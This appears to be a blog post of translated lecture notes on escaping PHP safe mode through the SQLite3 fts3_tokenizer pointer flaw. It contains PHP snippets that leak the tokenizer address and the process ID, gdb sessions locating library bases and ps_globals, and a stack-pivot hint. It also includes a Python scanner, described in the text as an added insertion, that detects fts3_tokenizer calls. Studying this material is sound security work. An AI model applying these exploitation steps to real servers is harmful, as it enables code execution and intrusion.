7/31 [Mentor 이종호]

by sonysame 2019. 7. 31.

root //rkddlsdnr



safe mode



?><?php

system("id");

phpinfo();



mod_cgi, php-fpm

Find vulnerabilities in the modules that PHP uses

CVE-2015-0273, CVE-2015-6834, ...

Environment-dependent; depends on the PHP version

A bug that is less environment-dependent!


sqlite.so

In the SQLite3 fts_tokenizer function, a callback function address is used without proper validation, so code execution



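<?php
// Open an in-memory SQLite database
$db = new SQLite3(":memory:");
// The one-argument form returns the tokenizer's address as a blob; hex() makes it printable
$row = $db->query("select hex(fts3_tokenizer('simple')) addr;")->fetchArray();
$leaked_addr = $row['addr'];
echo $leaked_addr."\n";
?>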
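For review and detection, the query shape above can be searched for in application SQL. The following Python scanner is an added example, not part of the original notes or the lecture material; the label names, the function names and the SAMPLES statements are assumptions made for illustration.

```python
import re

# Any SQL call to fts3_tokenizer(); ordinary FTS3 table use never needs it.
CALL = re.compile(r"\bfts3_tokenizer\s*\(", re.IGNORECASE)
# Bound-parameter placeholders: ?, ?1, :name, @name, $name
BOUND = re.compile(r"\?\d*|[:@$]\w+")

def call_args(sql, pos):
    """Split the argument list starting at pos (just past the '(')."""
    out, depth, in_str = [], 1, False
    for ch in sql[pos:]:
        if in_str:
            in_str = ch != "'"       # a doubled '' re-enters on the next char
        elif ch == "'":
            in_str = True
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return [a.strip() for a in "".join(out).split("\0")]
        elif ch == "," and depth == 1:
            ch = "\0"                # mark a top-level argument separator
        out.append(ch)
    return None                      # unbalanced call: report, do not guess

def classify(sql):
    """Return one label per fts3_tokenizer() call found in a SQL statement."""
    labels = []
    for m in CALL.finditer(sql):
        args = call_args(sql, m.end())
        if args is None or len(args) > 2 or "" in args:
            labels.append("malformed")
        elif len(args) == 1:
            labels.append("pointer-read")      # shape of the query in the notes
        else:                                  # a pointer is passed as 2nd argument
            bound = BOUND.fullmatch(args[1])
            labels.append("pointer-set-bound" if bound else "pointer-set-literal")
    return labels

# Constructed sample statements (not captured from any real system).
SAMPLES = [
    "select hex(fts3_tokenizer('simple')) addr;",
    "SELECT fts3_tokenizer('tok,(a)', :ptr)",
    "SELECT fts3_tokenizer('tok', x'0000000000000000')",  # placeholder blob
    "CREATE VIRTUAL TABLE docs USING fts3(body, tokenize=simple)",
    "SELECT fts3_tokenizer('simple'",
]

def scan(statements):
    return {s: found for s in statements if (found := classify(s))}
```
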


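<?php
// Flush and restart output buffering so the PID is sent right away
ob_end_flush();
flush();
ob_flush();
ob_start();
echo getmypid();
// Pad the output with 0x1212 spaces before flushing
echo str_repeat(" ",0x1212);
ob_end_flush();
ob_start();
// Keep the process alive for 10 seconds
sleep(10);
?>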


cd /var/www/html

curl http://localhost/test.php


service httpd restart



shell cat /proc/~/maps | grep "libsqlite"


Base address of libsqlite3.so.0.8.6


ext/session/php_session.h



cache_limiter, so that the stack can be used freely



shell


 shell cat /proc/2139/maps | grep "libphp"

find /g 0x7f28ee027000, +0x100000, 0x4141414142424242



(gdb) shell cat /proc/2139/maps | grep "libphp"

7f28edaf6000-7f28ede27000 r-xp 00000000 fd:00 924720                     /usr/lib64/httpd/modules/libphp5.so

7f28ede27000-7f28ee027000 ---p 00331000 fd:00 924720                     /usr/lib64/httpd/modules/libphp5.so

7f28ee027000-7f28ee07d000 rw-p 00331000 fd:00 924720                     /usr/lib64/httpd/modules/libphp5.so

(gdb) find /g 0x7f28ee027000, +0x100000, 0x4141414142424242

0x7f28ee090bb0 <ps_globals+48>

warning: Unable to access target memory at 0x7f28ee0988b8, halting search.

1 pattern found.

(gdb) x/x 0x7f28ee090bb0-7f28edaf6000

Invalid number "7f28edaf6000".

(gdb) x/x 0x7f28ee090bb0-0x7f28edaf6000

0x59abb0:       Cannot access memory at address 0x59abb0

(gdb) x/gx 0x7f28ee090bb0

0x7f28ee090bb0 <ps_globals+48>: 0x4141414142424242

(gdb) shell cat /proc/2139/maps | grep "libsqlite"

7f28e0666000-7f28e06f1000 r-xp 00000000 fd:00 788781                     /usr/lib64/libsqlite3.so.0.8.6

7f28e06f1000-7f28e08f1000 ---p 0008b000 fd:00 788781                     /usr/lib64/libsqlite3.so.0.8.6

7f28e08f1000-7f28e08f4000 rw-p 0008b000 fd:00 788781                     /usr/lib64/libsqlite3.so.0.8.6

(gdb) x/x 0x7f28edaf6000-0x7f28e0666000

0xd490000:      Cannot access memory at address 0xd490000





The instruction that uses rbp is generally leave
Use any leave; ret sequence

